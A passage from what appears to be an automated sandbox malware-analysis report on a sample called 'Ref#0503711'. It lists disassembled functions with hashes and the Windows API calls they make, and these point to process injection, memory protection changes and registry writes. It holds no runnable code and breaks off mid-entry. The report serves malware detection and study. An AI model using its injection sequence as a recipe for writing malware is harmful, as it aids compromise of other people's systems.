                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $&
                                                                • API String ID: 0-3840539561
                                                                • Opcode ID: 7ba06161bef96c579abfc44163cc032d6e9f755ec324c6b1d43408dc400c3e7b
                                                                • Instruction ID: 971c58e476f034f8e81ea35fec675da57d5c3d60cda17cc2d40eac36080bd2b3
                                                                • Opcode Fuzzy Hash: 7ba06161bef96c579abfc44163cc032d6e9f755ec324c6b1d43408dc400c3e7b
                                                                • Instruction Fuzzy Hash: C6210E74A85208DFD794DF98D854BDDBBF2FB49340F1081A5D409A7250CB789E85CF40
                                                                Function 06210935 Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$+
                                                                • API String ID: 0-2552117581
                                                                • Opcode ID: 3a1aaad19e5001ace62edf7cbeb3b337427c53632d15e2673d1726e6557ac780
                                                                • Instruction ID: 9fe6190ee69a30480ef645756d221e82fe939cef56e831b7a58aba359f97f97a
                                                                • Opcode Fuzzy Hash: 3a1aaad19e5001ace62edf7cbeb3b337427c53632d15e2673d1726e6557ac780
                                                                • Instruction Fuzzy Hash: 1211D474928229CFEB64CF25C888BEDB7F1AB15308F1094DAD40AB7255DB799AC5CF10
                                                                Function 0621011C Relevance: 2.5, Strings: 2, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$C
                                                                • API String ID: 0-3682062375
                                                                • Opcode ID: 8a6d13b41fbc74f67de0b99561355c30b77a76a482105b9ccf3eda84b1c046b3
                                                                • Instruction ID: 824949eea11fa3d11c67e1cfd71dae1ca4c2e5afdca650cfbcc623c97da1c1b3
                                                                • Opcode Fuzzy Hash: 8a6d13b41fbc74f67de0b99561355c30b77a76a482105b9ccf3eda84b1c046b3
                                                                • Instruction Fuzzy Hash: F71112B4918228CFDB60CF64D880BECB7F5AB15304F1084DAC40AAB240DB399E89CF25
                                                                Function 0621017A Relevance: 2.5, Strings: 2, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$+
                                                                • API String ID: 0-2552117581
                                                                • Opcode ID: 97d103b645287f45c7b3f21c7674957b692f8723a554144e83dc70feef348647
                                                                • Instruction ID: 3130ee7e4549785dbdb4ee9a0e7b33d18e1cb37b174c73e4e4254bdd4d480bf9
                                                                • Opcode Fuzzy Hash: 97d103b645287f45c7b3f21c7674957b692f8723a554144e83dc70feef348647
                                                                • Instruction Fuzzy Hash: 78010474918229CFEB20CF60C984BEDB7F1AB15308F1084DAD40AAB245DB798BC6CF10
                                                                Function 060BC000 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,bq
                                                                • API String ID: 0-2474004448
                                                                • Opcode ID: a819509843fa52afe5b003f6ac7bfc640e7d076f78858d39ac8900cdb66bbafc
                                                                • Instruction ID: 6bbed13a1023314832d6fea09829b1cd2b06ab515d24b1778f7959dd0dc4f42f
                                                                • Opcode Fuzzy Hash: a819509843fa52afe5b003f6ac7bfc640e7d076f78858d39ac8900cdb66bbafc
                                                                • Instruction Fuzzy Hash: 6D52F875A402288FDB64CF69C984BEDBBF6BB88301F1580D9E549AB351DB309D80CF61
                                                                Function 060B6540 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (_^q
                                                                • API String ID: 0-538443824
                                                                • Opcode ID: ad72717e1373045c7dc4955ed0df67d94aaaa83a21957cd0b4e60a9d84b063bb
                                                                • Instruction ID: 6cf26c25432fc26207f9bef8f7aaac11d1c5b2f40113afa7dec22fcf9bcec416
                                                                • Opcode Fuzzy Hash: ad72717e1373045c7dc4955ed0df67d94aaaa83a21957cd0b4e60a9d84b063bb
                                                                • Instruction Fuzzy Hash: 1D228075A502159FDB44DF68D490AADBBF6FF88300F148169E905EB3A1CB76EC81CB90
                                                                Function 060E14AC Relevance: 1.8, APIs: 1, Instructions: 267processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060E171F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 6ab584563c189613666dad33e14056f4157d3f599e786a8e019884a5a83452f3
                                                                • Instruction ID: a9affa1bfdb4b07d76b266cf751906de581f4795f2fd0402c27622d30dd6c352
                                                                • Opcode Fuzzy Hash: 6ab584563c189613666dad33e14056f4157d3f599e786a8e019884a5a83452f3
                                                                • Instruction Fuzzy Hash: 2BA102B1D00228CFDB90CFA9C8857EDBBF1BF09314F1495A9E899A7240DB749985CF85
                                                                Function 060E14B8 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060E171F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 3833366b1b30bd51c937bf35def5b4833679712ee14b8ebab71c2a7ffdc72d01
                                                                • Instruction ID: c20270476c87eef96508259ac8ec55c68ea9361d954b1ca78df37f17b38d7458
                                                                • Opcode Fuzzy Hash: 3833366b1b30bd51c937bf35def5b4833679712ee14b8ebab71c2a7ffdc72d01
                                                                • Instruction Fuzzy Hash: F2A111B1D00228CFDB90CFA9C8457EEBBF1BF09314F1491A9E859A7280DB749985CF85
                                                                Function 060E3C9C Relevance: 1.7, APIs: 1, Instructions: 173fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CopyFileA.KERNEL32(?,?,?), ref: 060E3E23
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: CopyFile
                                                                • String ID:
                                                                • API String ID: 1304948518-0
                                                                • Opcode ID: 57f80dc73c420a46dce021b5d07ff1f1c7f1d8c31c963517b8c85a39d6271ae6
                                                                • Instruction ID: f0e2e93011f6ef1b7039b47d988b2e16853491f02ccb76375e5867529e8c4d08
                                                                • Opcode Fuzzy Hash: 57f80dc73c420a46dce021b5d07ff1f1c7f1d8c31c963517b8c85a39d6271ae6
                                                                • Instruction Fuzzy Hash: 42613374D00268CFDB94CFA9D9857EDBFF1BB48310F24852AE859AB290DB748985CF41
                                                                Function 060E3CA8 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CopyFileA.KERNEL32(?,?,?), ref: 060E3E23
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: CopyFile
                                                                • String ID:
                                                                • API String ID: 1304948518-0
                                                                • Opcode ID: 5a8e2eaae5e39c0ff69d29f0de60dce630359d3c2a6e36c1554038c830f1ff9f
                                                                • Instruction ID: 665ad4fb71a3bcf1fc196c2507957e39dacf0e8731932a7b9ccdea8dac4be38c
                                                                • Opcode Fuzzy Hash: 5a8e2eaae5e39c0ff69d29f0de60dce630359d3c2a6e36c1554038c830f1ff9f
                                                                • Instruction Fuzzy Hash: 47612274D002688FDB94CFA9D8857EDBFF1BB49310F248129E859AB290DB749985CF81
                                                                Function 060E417C Relevance: 1.7, APIs: 1, Instructions: 163registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 060E42E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID:
                                                                • API String ID: 3702945584-0
                                                                • Opcode ID: d3a4960b2e71ec8bc30d0aff3935006fd3b3814d89e36a59d7d375241d0d35ea
                                                                • Instruction ID: f20e2c20de7fc590e2a9fc38c3dc745f41b96f39911718fa707a4ae66ecd0113
                                                                • Opcode Fuzzy Hash: d3a4960b2e71ec8bc30d0aff3935006fd3b3814d89e36a59d7d375241d0d35ea
                                                                • Instruction Fuzzy Hash: 5E51EDB4D002689FDB60CFA9C985B9EBFF1BB09300F24812AE858B7251DB349985CF45
                                                                Function 060E4188 Relevance: 1.7, APIs: 1, Instructions: 157registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 060E42E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID:
                                                                • API String ID: 3702945584-0
                                                                • Opcode ID: ac7a3784ea3df75ce5ecebc2a110a8828290308185f2a8c432280115fea75b9f
                                                                • Instruction ID: ef371572e4f6d6426404babbfff28a70162b752b27b51e1e17d38f4f4a02a57d
                                                                • Opcode Fuzzy Hash: ac7a3784ea3df75ce5ecebc2a110a8828290308185f2a8c432280115fea75b9f
                                                                • Instruction Fuzzy Hash: 4851DCB4D002289FDB50CFA9C885B9EBFF1FB49300F14912AE858B7250DB749985CF45
                                                                Function 060E3F45 Relevance: 1.6, APIs: 1, Instructions: 146registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(?,?,?,?,?), ref: 060E4078
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: 136bca17e944ae7b51441dd9b7035890662af6ad42b3ccc771c44e4b67a1913b
                                                                • Instruction ID: 9493fb0ac40ee5a46c296189bfb991248230c5112d8832893343a8f225076d5d
                                                                • Opcode Fuzzy Hash: 136bca17e944ae7b51441dd9b7035890662af6ad42b3ccc771c44e4b67a1913b
                                                                • Instruction Fuzzy Hash: C351FEB4D002589FDF64CFA9D985A9EBFF1BF49300F24942AE858B7250CB349985CF85
                                                                Function 060E3F50 Relevance: 1.6, APIs: 1, Instructions: 140registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(?,?,?,?,?), ref: 060E4078
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: 48d1159a2077d7fd02c956525655bbe589810f3776efedeeb1c6bdcf3e4d14a1
                                                                • Instruction ID: 30c26e1498dbdf0ef6dfbaf8485e0c4a93b0a26d85402251d2b670e85b7d9320
                                                                • Opcode Fuzzy Hash: 48d1159a2077d7fd02c956525655bbe589810f3776efedeeb1c6bdcf3e4d14a1
                                                                • Instruction Fuzzy Hash: 9C51FCB4D00258DFDF54CFA9D985A9EBFF1BB49300F20942AE818BB250DB349881CF85
                                                                Function 060E1F28 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 060E2003
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 42fc23e275d62ac068fc4ea2ec01bc10737d94fa7e1e098ad9ae3da3b7021bfb
                                                                • Instruction ID: fc6bec700b46cf4b7bd417e081df4df59e02f2631164d4bfa7cb43bb71369368
                                                                • Opcode Fuzzy Hash: 42fc23e275d62ac068fc4ea2ec01bc10737d94fa7e1e098ad9ae3da3b7021bfb
                                                                • Instruction Fuzzy Hash: 0941C9B4D012589FCF10CFA9D984ADEFBF1BB49310F24942AE818B7250C339AA45CF64
                                                                Function 060E1F30 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 060E2003
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 245255e0d2b0f1c3e83b4ffbc910a8a5a1d1810f57811d7b3c65493f0854f1ad
                                                                • Instruction ID: 88ea2b138c302b3afca23c91ba2b4f63dcfe1f7dd28f107db3deb9a87f767810
                                                                • Opcode Fuzzy Hash: 245255e0d2b0f1c3e83b4ffbc910a8a5a1d1810f57811d7b3c65493f0854f1ad
                                                                • Instruction Fuzzy Hash: C4419AB5D012589FCF10CFA9D984ADEFBF1BB49310F24942AE818B7250D739AA45CF64
                                                                Function 060E1DC9 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060E1E7A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 6032dc60ad4d65b8d0429d3e1b7554a955e47ec024f72e4067e097f64285f206
                                                                • Instruction ID: 1b4d1fdada48cfaf919b438293744afdbb30ad7f701ef5c8e3949fc9d68cf7b9
                                                                • Opcode Fuzzy Hash: 6032dc60ad4d65b8d0429d3e1b7554a955e47ec024f72e4067e097f64285f206
                                                                • Instruction Fuzzy Hash: 5F41A8B8D002589FCF10CFA9D880ADEFBB5EB49310F10946AE815B7210D735A945CFA9
                                                                Function 060E2418 Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 060E24C4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: b5ba878391ebd0ac478f24e8941f717ee177c7e3ac34aeda90240a4da50ec533
                                                                • Instruction ID: 6cc2bcecaefdbddff49fb21413a92f9872f3f3e8020e93223dca3406f939cb56
                                                                • Opcode Fuzzy Hash: b5ba878391ebd0ac478f24e8941f717ee177c7e3ac34aeda90240a4da50ec533
                                                                • Instruction Fuzzy Hash: E831CAB5D052589FCB10CFA9D984AEEFBF0BB49310F14942AE854B7210C734AA85CF64
                                                                Function 060E1DD0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060E1E7A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: a4516c31beac4a563565e5326bf93a340bf4f36951eb56c3daea7dd8169900b9
                                                                • Instruction ID: 5119e83998611c51152eed07978dee655eabc87d24115fb30e605535fda66d69
                                                                • Opcode Fuzzy Hash: a4516c31beac4a563565e5326bf93a340bf4f36951eb56c3daea7dd8169900b9
                                                                • Instruction Fuzzy Hash: F93187B9D002589FCF10CFA9D984ADEFBB5BB49310F10942AE815B7310D735A945CF59
                                                                Function 060E2420 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 060E24C4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 4cebd423f16b5f6d51bc3cfb0ac07d8f8eb1fdd2152b204b9bad322b22cac439
                                                                • Instruction ID: 27adba408e25d295d52903833eeb041720e757350ab9eda4b52c8c5e09b1a1f4
                                                                • Opcode Fuzzy Hash: 4cebd423f16b5f6d51bc3cfb0ac07d8f8eb1fdd2152b204b9bad322b22cac439
                                                                • Instruction Fuzzy Hash: 0731AAB5D01258DFCF10CFA9D984AEEFBB5BB49310F14942AE814B7210D735A985CF54
                                                                Function 060CD7F8 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 060CD89C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 6c5b7f5e7fc119d0543b37c28994ab9b7bc6aa281d949a3a54696aacb32625f2
                                                                • Instruction ID: 696ae0f5365a85cd021ce3f904ea87e0db927d9ad0862c7277d5c3dde6613a5d
                                                                • Opcode Fuzzy Hash: 6c5b7f5e7fc119d0543b37c28994ab9b7bc6aa281d949a3a54696aacb32625f2
                                                                • Instruction Fuzzy Hash: D13198B8D012589FCB10CFA9D984ADEFBB1BF49320F10942AE814B7250D775A945CF54
                                                                Function 060E1868 Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 060E191F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: c6253f25175d27a9e0de8c4229f3ee2c5880f324c01e44abf7c43a920b80c099
                                                                • Instruction ID: 3781e5ac4317ba3af24df383d187cb929ecbbbc621c022beeebe18f9ea68cc1b
                                                                • Opcode Fuzzy Hash: c6253f25175d27a9e0de8c4229f3ee2c5880f324c01e44abf7c43a920b80c099
                                                                • Instruction Fuzzy Hash: DE41CAB4D002589FCB50CFA9D984AEEBFF1BB49310F24802AE419B7250C738A985CF94
                                                                Function 060E1870 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 060E191F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: 034cb07a80d8dda180b83f72046336b906a0229eec116babb540b7f6b34f7724
                                                                • Instruction ID: 370dc920d4a9088a62c03769842ea780aa335280bc7cc13c11453f14d908d369
                                                                • Opcode Fuzzy Hash: 034cb07a80d8dda180b83f72046336b906a0229eec116babb540b7f6b34f7724
                                                                • Instruction Fuzzy Hash: C431BAB4D012589FCB50CFA9D984AEEFFF0BB49310F24802AE458B7250C738A985CF94
                                                                Function 060BFC90 Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq
                                                                • API String ID: 0-149360118
                                                                • Opcode ID: 9d55903772bd6bcfa3a06e95d0596461f10001d4603ae5b785bb9f0348ac826c
                                                                • Instruction ID: 5b63955854184da0552ac8757059456207269adee1147b9beb17751959736a95
                                                                • Opcode Fuzzy Hash: 9d55903772bd6bcfa3a06e95d0596461f10001d4603ae5b785bb9f0348ac826c
                                                                • Instruction Fuzzy Hash: 52A1C1317442019FC7599F64D854E6ABFB3FF89300B1585A9E6068F3A2CB36EC42DB91
                                                                Function 060B6CC8 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Pl^q
                                                                • API String ID: 0-2831078282
                                                                • Opcode ID: 24d0696d7c3c8d4d4d2008d38f3bd8fe430fb8f9c585fd98cbdb96ad23d205e1
                                                                • Instruction ID: fd49c802286b2ba4719b52d020bb08dcb4e1b66c2485953aa776dda4c20bb4c0
                                                                • Opcode Fuzzy Hash: 24d0696d7c3c8d4d4d2008d38f3bd8fe430fb8f9c585fd98cbdb96ad23d205e1
                                                                • Instruction Fuzzy Hash: 53910630B901158FCB54DF28C894AAA7BF6BF89710B2580A9E505DF3B5DB71EC41CB91
                                                                Function 060BB119 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q
                                                                • API String ID: 0-1614139903
                                                                • Opcode ID: ae0bda06e8fc95759d0fe6731d09b1f47e6f8de614db5223f69e1ab59cfdd866
                                                                • Instruction ID: cd45dd54f02abff23453167ab6b8924615e624881b312a9217e11653d7fcd156
                                                                • Opcode Fuzzy Hash: ae0bda06e8fc95759d0fe6731d09b1f47e6f8de614db5223f69e1ab59cfdd866
                                                                • Instruction Fuzzy Hash: AAA1E634A50218DFCB48EFA4D998ADDBBB2FF88301F559159E406AB365DF30AC46CB50
                                                                Function 060B0C28 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: pbq
                                                                • API String ID: 0-3896149868
                                                                • Opcode ID: 389acdc6894fccbefbae843b0c8db0b059f10ec1172609941175a6dae3f1d6c1
                                                                • Instruction ID: f9be16e00474929a023a713455330ec914d63bf12cdb323e1ec313eaccd81e10
                                                                • Opcode Fuzzy Hash: 389acdc6894fccbefbae843b0c8db0b059f10ec1172609941175a6dae3f1d6c1
                                                                • Instruction Fuzzy Hash: 67717E72640104AFCB469FA8C814D6ABFF6FF8931071984D9E245CF272DA36DC22DB61
                                                                Function 060B1C88 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq
                                                                • API String ID: 0-149360118
                                                                • Opcode ID: 911dd5794280c5d28e82d230b0d39061cf785c2020e748ceb19d197400b58649
                                                                • Instruction ID: 1b7ee136d62314b9a69d069f7971c40ab96ed9acef0bb4d9b5639ee700c4b881
                                                                • Opcode Fuzzy Hash: 911dd5794280c5d28e82d230b0d39061cf785c2020e748ceb19d197400b58649
                                                                • Instruction Fuzzy Hash: C151D031A046568FCB00CF69D4949AAFFF5FF86320B15C6AAD5659B242D730F852CBD0
                                                                Function 01970B78 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: dae8ef815cabbb15c47b57896cd68e1be3fff7fb535ca92fe8244a8363ecf547
                                                                • Instruction ID: 67641e2f2cdb73a750f06d136c204ffc42329e325f54ce9d72f27ae31e57c4fe
